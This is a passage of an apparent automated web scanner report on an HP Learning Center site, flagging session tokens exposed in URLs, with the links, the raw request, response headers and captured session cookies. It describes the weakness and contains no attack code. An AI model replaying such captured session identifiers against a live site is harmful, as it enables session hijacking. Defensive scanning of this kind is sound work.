<h2 id="sectionalNavHeader">»<a href="/index.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f" class="bold">Learning center</a>
...[SNIP]...
</span> <a href="https://h30187.www3.hp.com/security/login.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f&target=http%3A%2F%2Fh30187.www3.hp.com%2Fcampus%2Fp%2FcampusId%2F10640%2FGraphic_arts.htm" class="navmenu">Sign in</a>
...[SNIP]...
</span> <a href="/sessions/index.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f">My classes</a>
...[SNIP]...
</span> <a href="/all_courses.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f">All classes</a>
...[SNIP]...
</span> <a href="/discussions/new/viewMessageBoard/p/messageBoardId/2338?hplcpsession.id=ddde6b1e223a54f104d30891553f">Discussions</a>
...[SNIP]...
</span> <a href="/page/p/title/faq?hplcpsession.id=ddde6b1e223a54f104d30891553f">FAQ</a>
...[SNIP]...
</span> <a href="/support/contactUs.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f">Contact us</a>
...[SNIP]...
</span> <a href="/courses/refer.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f&target=http%3A%2F%2Fh30187.www3.hp.com%2Fcampus%2Fp%2FcampusId%2F10640%2FGraphic_arts.htm&campusId=10640">Tell a friend</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/courses/overview/p/courseId/34389/Adobe_Photoshop_CS4_introduction.htm?courseSessionId=306003&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f"><img src="http://hplc-prod.s3.amazonaws.com/media/43988/Adobe_Photoshop_CS4_introduction_64x64.jpg?v=1281722923000" alt="Adobe Photoshop CS4: introduction" border="0"/>
...[SNIP]...
<td align=left valign="top">
<a href="/courses/overview/p/courseId/34389/Adobe_Photoshop_CS4_introduction.htm?courseSessionId=306003&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f" class="bold">Adobe Photoshop CS4: introduction</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/articles/viewArticle/p/courseId/39570/Adobe_Photoshop_CS4_layer_basics_quick_lesson_.htm?courseSessionId=306047&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f"><img src="http://hplc-prod.s3.amazonaws.com/media/49584/Adobe_Photoshop_CS4_layer_basics_64x64.jpg?v=1281733557000" alt="Adobe Photoshop CS4: layer basics (quick lesson)" border="0"/>
...[SNIP]...
<td align=left valign="top">
<a href="/articles/viewArticle/p/courseId/39570/Adobe_Photoshop_CS4_layer_basics_quick_lesson_.htm?courseSessionId=306047&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f" class="bold">Adobe Photoshop CS4: layer basics (quick lesson)</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/courses/overview/p/courseId/7/Building_your_first_web_page.htm?courseSessionId=319918&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f"><img src="http://hplc-prod.s3.amazonaws.com/media/46149/Building_your_first_web_page_64x64.jpg?v=1281723189000" alt="Building your first web page" border="0"/>
...[SNIP]...
<td align=left valign="top">
<a href="/courses/overview/p/courseId/7/Building_your_first_web_page.htm?courseSessionId=319918&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f" class="bold">Building your first web page</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/articles/viewArticle/p/courseId/39808/Changing_hue_and_sat.htm?courseSessionId=320072&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f"><img src="http://hplc-prod.s3.amazonaws.com/media/49719/Change_hue_saturation_Photoshop_CS4_64x64.jpg?v=1281735208000" alt="Changing hue and saturation in Adobe.. Photoshop.. CS4 (quick lesson)" border
...[SNIP]...
<td align=left valign="top">
<a href="/articles/viewArticle/p/courseId/39808/Changing_hue_and_sat.htm?courseSessionId=320072&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f" class="bold">Changing hue and saturation in Adobe.. Photoshop.. CS4 (quick lesson)</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/articles/viewArticle/p/courseId/39807/Exploring_color_mode.htm?courseSessionId=320073&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f"><img src="http://hplc-prod.s3.amazonaws.com/media/49717/Explore_color_modes_Photoshop_CS4_64x64.jpg?v=1281735207000" alt="Exploring color modes in Adobe.. Photoshop.. CS4 (quick lesson)" border="0"/>
...[SNIP]...
<td align=left valign="top">
<a href="/articles/viewArticle/p/courseId/39807/Exploring_color_mode.htm?courseSessionId=320073&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f" class="bold">Exploring color modes in Adobe.. Photoshop.. CS4 (quick lesson)</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/courses/overview/p/courseId/23629/Intermediate_website_design.htm?courseSessionId=306011&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f"><img src="http://hplc-prod.s3.amazonaws.com/media/40527/Intermediate_website_design_64x64.jpg?v=1281721718000" alt="Intermediate website design" border="0"/>
...[SNIP]...
<td align=left valign="top">
<a href="/courses/overview/p/courseId/23629/Intermediate_website_design.htm?courseSessionId=306011&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f" class="bold">Intermediate website design</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/courses/overview/p/courseId/12976/Jump_start_your_crea.htm?courseSessionId=306013&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f"><img src="http://hplc-prod.s3.amazonaws.com/media/33169/jump-start_your_creativity_64x64.jpg?v=1281719082000" alt="Jump-start your creativity: exploring Leonardo da Vinci's notebooks" border="0"/>
...[SNIP]...
<td align=left valign="top">
<a href="/courses/overview/p/courseId/12976/Jump_start_your_crea.htm?courseSessionId=306013&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f" class="bold">Jump-start your creativity: exploring Leonardo da Vinci's notebooks</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/articles/viewArticle/p/courseId/38756/Photoshop_101_image_.htm?courseSessionId=305979&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f"><img src="http://hplc-prod.s3.amazonaws.com/media/48894/Photoshop_101_image_size_and_resolution_basics_64x64.jpg?v=1281728528000" alt="Photoshop 101: image size and resolution basics (quick lesson)" bo
...[SNIP]...
<td align=left valign="top">
<a href="/articles/viewArticle/p/courseId/38756/Photoshop_101_image_.htm?courseSessionId=305979&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f" class="bold">Photoshop 101: image size and resolution basics (quick lesson)</a>
...[SNIP]...
<td valign="top" rowspan="2">
<a href="/courses/overview/p/courseId/39129/Print_marketing_mate.htm?courseSessionId=306031&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f"><img src="http://hplc-prod.s3.amazonaws.com/media/49070/Print_marketing_materials_in-house_on_a_wide-format_printer_64x64.jpg?v=1281731127000" alt="Print marketing materials in-house on a wide-format p
...[SNIP]...
<td align=left valign="top">
<a href="/courses/overview/p/courseId/39129/Print_marketing_mate.htm?courseSessionId=306031&campusId=10640&hplcpsession.id=ddde6b1e223a54f104d30891553f" class="bold">Print marketing materials in-house on a wide-format printer</a>
...[SNIP]...
</span><a href="/howto_QL_courses.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f&contentType=How-to+in+2" class="bold">How-to videos</a>
...[SNIP]...
</span><a href="/howto_QL_courses.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f&contentType=Quick+Lesson" class="bold">Quick lessons</a>
...[SNIP]...
</span> <a href="/all_courses.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f" class="campus_course_bold">All classes</a>
...[SNIP]...
<br>For more information,
<a href="/page/p/title/general_faqs?hplcpsession.id=ddde6b1e223a54f104d30891553f#4" class="udrline">read
our FAQ</a>
...[SNIP]...
<img src="/resources/images/s.gif" border="0" width="5" height="1" alt=""/>
<a href="/courses/refer.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f&target=http%3A%2F%2Fh30187.www3.hp.com%2Fcampus%2Fp%2FcampusId%2F10640%2FGraphic_arts.htm&campusId=10640" class="bold">Email this site</a>
...[SNIP]...
<div id="rssLink"><a href="/rssfeed/index.jsp?hplcpsession.id=ddde6b1e223a54f104d30891553f" class="udrlinebold">RSS feed</a>
...[SNIP]...
<div style="display:none">
   <img src="/is/3092198518/p/productId/104916/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f" height="1" width="1" alt=""/>
   <img src="/is/b1e9f1dda3/p/productId/104908/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f" height="1" width="1" alt=""/>
   <img src="/is/3461c7ae0c/p/productId/104915/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f" height="1" width="1" alt=""/>
   <img src="/is/dae5029aaa/p/productId/104907/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f" height="1" width="1" alt=""/>
   <img src="/is/8242affead/p/productId/104906/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f" height="1" width="1" alt=""/>
   <img src="/is/450e08e825/p/productId/104913/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f" height="1" width="1" alt=""/>
   <img src="/is/0661d64dfc/p/productId/104912/eventType/PDV/puid/999999b/campusId/10640/i.gif?hplcpsession.id=ddde6b1e223a54f104d30891553f" height="1" width="1" alt=""/>
</div>
...[SNIP]...

5.3. http://h30187.www3.hp.com/howto_QL_courses.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://h30187.www3.hp.com
Path:	/howto_QL_courses.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

http://h30187.www3.hp.com/all_courses.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/courses/refer.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a&target=http%3A%2F%2Fh30187.www3.hp.com%2Fhowto_QL_courses.jsp%3FcontentType%3DHow-to%2Bin%2B2%26mcid%3Dexplore-create
http://h30187.www3.hp.com/discussions/new/viewMessageBoard/p/messageBoardId/2338?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/index.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/is/012a5e459e/p/productId/104918/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/is/13ef8b79bb/p/productId/104922/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/is/4995506369/p/productId/104921/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/is/4c10f0403f/p/productId/104917/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/is/61e4a4ca21/p/productId/104919/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/is/f5d5880c29/p/productId/104916/eventType/PDV/puid/999999b/campusId/700/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/is/fe52e42a06/p/productId/104920/eventType/PDV/puid/999999b/i.gif?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/page/p/title/faq?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/rssfeed/index.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/sessions/index.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/support/contactUs.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14091/Microsoft_Windows_Vista_Sidebar_adding_gadgets.htm?courseSessionId=173999&campusId=11264&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14167/Microsoft_Excel_2007_create_a_PivotTable.htm?courseSessionId=173981&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14168/Microsoft_Windows_Vi.htm?courseSessionId=173997&campusId=11262&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14168/Microsoft_Windows_Vi.htm?courseSessionId=173997&campusId=11264&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14169/Microsoft_Excel_2007.htm?courseSessionId=173984&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14170/Microsoft_Excel_2007.htm?courseSessionId=173983&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14171/Microsoft_Excel_2007_filter_data.htm?courseSessionId=173982&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14172/Microsoft_Windows_Vi.htm?courseSessionId=173987&campusId=11264&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14173/Microsoft_Windows_Vi.htm?courseSessionId=173988&campusId=11264&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14760/Microsoft_Excel_2007.htm?courseSessionId=173985&campusId=11262&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14760/Microsoft_Excel_2007.htm?courseSessionId=173985&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14761/Microsoft_Windows_Vista_use_Disk_Cleanup.htm?courseSessionId=173998&campusId=11264&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14762/Microsoft_Word_2007_.htm?courseSessionId=173980&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14763/Microsoft_Word_2007_take_a_tour_of_the_Ribbon.htm?courseSessionId=174000&campusId=11262&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14763/Microsoft_Word_2007_take_a_tour_of_the_Ribbon.htm?courseSessionId=174000&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/14764/Microsoft_Word_2007_use_the_Track_Changes_feature.htm?courseSessionId=174001&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/16608/HP_Backup_and_Recovery_Manager_restore_files.htm?courseSessionId=175481&campusId=10163&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/16609/HP_Backup_and_Recovery_Manager_schedule_backups.htm?courseSessionId=175482&campusId=10163&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/18329/Use_color_coding_to_prioritize_your_email.htm?courseSessionId=175489&campusId=11260&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/18330/Mastering_email_keep_your_inbox_clutter_free.htm?courseSessionId=175486&campusId=11260&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/18330/Mastering_email_keep_your_inbox_clutter_free.htm?courseSessionId=175486&campusId=11262&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/18331/Use_Google_Desktop_t.htm?courseSessionId=175490&campusId=11260&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/19629/Color_your_business_.htm?courseSessionId=173976&campusId=11260&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/19629/Color_your_business_.htm?courseSessionId=173976&campusId=11262&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/25989/Microsoft_OneNote_creating_and_using_notebooks.htm?courseSessionId=175487&campusId=11260&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/25990/Microsoft_OneNote_getting_started.htm?courseSessionId=175488&campusId=11260&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/26569/Microsoft_PowerPoint.htm?courseSessionId=173979&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/26589/Microsoft_PowerPoint.htm?courseSessionId=173986&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/32049/HP_ProtectTools_Secu.htm?courseSessionId=175483&campusId=10163&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/32069/HP_ProtectTools_Secu.htm?courseSessionId=175484&campusId=10163&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/32089/HP_ProtectTools_Secu.htm?courseSessionId=175485&campusId=10163&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/35826/Using_the_HP_Yahoo_Printing_Toolbar.htm?courseSessionId=174002&campusId=11262&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/35909/Microsoft_Excel_2007.htm?courseSessionId=173977&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/35913/Microsoft_Windows_Vi.htm?courseSessionId=173978&campusId=11264&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/39829/Microsoft_Windows_7_.htm?courseSessionId=324159&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/40439/Microsoft_Excel_2010.htm?campusId=700&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/40439/Microsoft_Excel_2010.htm?courseSessionId=368863&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/40440/Microsoft_Excel_2010.htm?courseSessionId=368864&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/40441/Microsoft_Excel_2010_creating_PivotTables.htm?courseSessionId=368865&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/40442/Microsoft_Word_2010_take_a_tour_of_the_Ribbon.htm?courseSessionId=368866&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
http://h30187.www3.hp.com/tutorials/viewHowTo/p/courseId/40443/Microsoft_PowerPoint.htm?courseSessionId=368867&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a
https://h30187.www3.hp.com/security/login.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a&target=http%3A%2F%2Fh30187.www3.hp.com%2Fhowto_QL_courses.jsp%3FcontentType%3DHow-to%2Bin%2B2%26mcid%3Dexplore-create

Request

GET /howto_QL_courses.jsp?contentType=How-to+in+2&mcid=explore-create HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Jun 2011 11:50:04 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:11 GMT
Set-Cookie: hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a; path=/
Set-Cookie: JSESSIONID=abcECuaO8KCmEcQPMyGdt; path=/
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE7981C84ADBE837511DA16D6F9C79535DB1B09B6E07A65EF9437E6F5EC2ECBBB0;PATH=/
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
X-Nginx-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 131813
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">

<head>
<title>
HP
Learning center
...[SNIP]...
<h2 id="sectionalNavHeader">»<a href="/index.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" class="bold">Learning center</a>
...[SNIP]...
</span> <a href="https://h30187.www3.hp.com/security/login.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a&target=http%3A%2F%2Fh30187.www3.hp.com%2Fhowto_QL_courses.jsp%3FcontentType%3DHow-to%2Bin%2B2%26mcid%3Dexplore-create" class="navmenu">Sign in</a>
...[SNIP]...
</span> <a href="/sessions/index.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a">My classes</a>
...[SNIP]...
</span> <a href="/all_courses.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a">All classes</a>
...[SNIP]...
</span> <a href="/discussions/new/viewMessageBoard/p/messageBoardId/2338?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a">Discussions</a>
...[SNIP]...
</span> <a href="/page/p/title/faq?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a">FAQ</a>
...[SNIP]...
</span> <a href="/support/contactUs.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a">Contact us</a>
...[SNIP]...
</span> <a href="/courses/refer.jsp?hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a&target=http%3A%2F%2Fh30187.www3.hp.com%2Fhowto_QL_courses.jsp%3FcontentType%3DHow-to%2Bin%2B2%26mcid%3Dexplore-create">Tell a friend</a>
...[SNIP]...
<div id="FeaturedCourseImage" class="">

<a href="/tutorials/viewHowTo/p/courseId/40439/Microsoft_Excel_2010.htm?campusId=700&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" ><img src="http://hplc-prod.s3.amazonaws.com/media/50603/Microsoft_Excel_2010_Take_a_tour_of_the_interface_and_basic_skills_180x110_play.jpg?v=1291754008000" border="0" alt="Microsoft.. Excel 2010: tak
...[SNIP]...
<td valign="top" colspan="2" width="360">

<a href="/tutorials/viewHowTo/p/courseId/40439/Microsoft_Excel_2010.htm?campusId=700&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" class="color003366bld" title="This animated demonstration introduces you to the new Microsoft Excel 2010 interface and teaches you some basic skills.">Microsoft.. Excel 2010: take a tour of the interface and learn basic skills</a>
...[SNIP]...
<div class="Button">

<a href="/tutorials/viewHowTo/p/courseId/40439/Microsoft_Excel_2010.htm?campusId=700&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" >View Now »</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/19629/Color_your_business_.htm?courseSessionId=173976&campusId=11262&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Learn how development of the right color scheme for your marketing collateral can take your business to the next level.">Color your business: develop a marketing color scheme</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/18330/Mastering_email_keep_your_inbox_clutter_free.htm?courseSessionId=175486&campusId=11262&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Learn how to organize email files and folder structure and use your program's search functionality to achieve better inbox management.">Mastering email: keep your inbox clutter-free</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14760/Microsoft_Excel_2007.htm?courseSessionId=173985&campusId=11262&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration introduces you to the new Microsoft Excel 2007 interface, which is very different from earlier versions.">Microsoft.. Excel 2007: take a tour of the interface and learn basic skills</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14168/Microsoft_Windows_Vi.htm?courseSessionId=173997&campusId=11262&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration shows you how to find files using basic Search in Windows Vista.">Microsoft.. Windows Vista: find files using basic Search</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14763/Microsoft_Word_2007_take_a_tour_of_the_Ribbon.htm?courseSessionId=174000&campusId=11262&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration shows you how to use the Ribbon, the new, tabbed navigation system in Microsoft Word 2007.">Microsoft.. Word 2007: take a tour of the Ribbon</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/35826/Using_the_HP_Yahoo_Printing_Toolbar.htm?courseSessionId=174002&campusId=11262&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="See how the HP Yahoo! Printing Toolbar gives you one-click access to your favorite websites, Yahoo! email account and much more.">Using the HP Yahoo! Printing Toolbar</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14167/Microsoft_Excel_2007_create_a_PivotTable.htm?courseSessionId=173981&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This step-by-step demonstration shows you how to summarize a large amount of data to glean some meaning from it using PivotTables in Microsoft Excel 2007.">Microsoft.. Excel 2007: create a PivotTable</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14171/Microsoft_Excel_2007_filter_data.htm?courseSessionId=173982&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration shows you how to filter data in Microsoft Excel 2007. ">Microsoft.. Excel 2007: filter data</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14170/Microsoft_Excel_2007.htm?courseSessionId=173983&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration shows you how to link and unlink information between Microsoft Excel workbooks.">Microsoft.. Excel 2007: link and unlink content between two workbooks</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/35909/Microsoft_Excel_2007.htm?courseSessionId=173977&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="Formatting can make a chart come to life with colors, patterns and effects. This demonstration teaches you to manually format parts of a chart.">Microsoft.. Excel 2007: manually format parts of a chart</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14169/Microsoft_Excel_2007.htm?courseSessionId=173984&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration shows you how to record a simple macro in Excel and edit it in VBA.">Microsoft.. Excel 2007: record a simple macro and edit it in VBA</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/14760/Microsoft_Excel_2007.htm?courseSessionId=173985&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This animated demonstration introduces you to the new Microsoft Excel 2007 interface, which is very different from earlier versions.">Microsoft.. Excel 2007: take a tour of the interface and learn basic skills</a>
...[SNIP]...
<td align="left" valign="top" width="540">

<a href="/tutorials/viewHowTo/p/courseId/40441/Microsoft_Excel_2010_creating_PivotTables.htm?courseSessionId=368865&campusId=11263&hplcpsession.id=01e9d0c230a4f787cd13e6abcd4a" title="This step-by-step demonstration shows you how to summarize a large amount of data to glean some meaning from it using PivotTables in Microsoft Excel 2010.">Microsoft.. Excel 2010: creating PivotTables</a>
...[SNIP]...
<td align="left" valign="top" width="540">

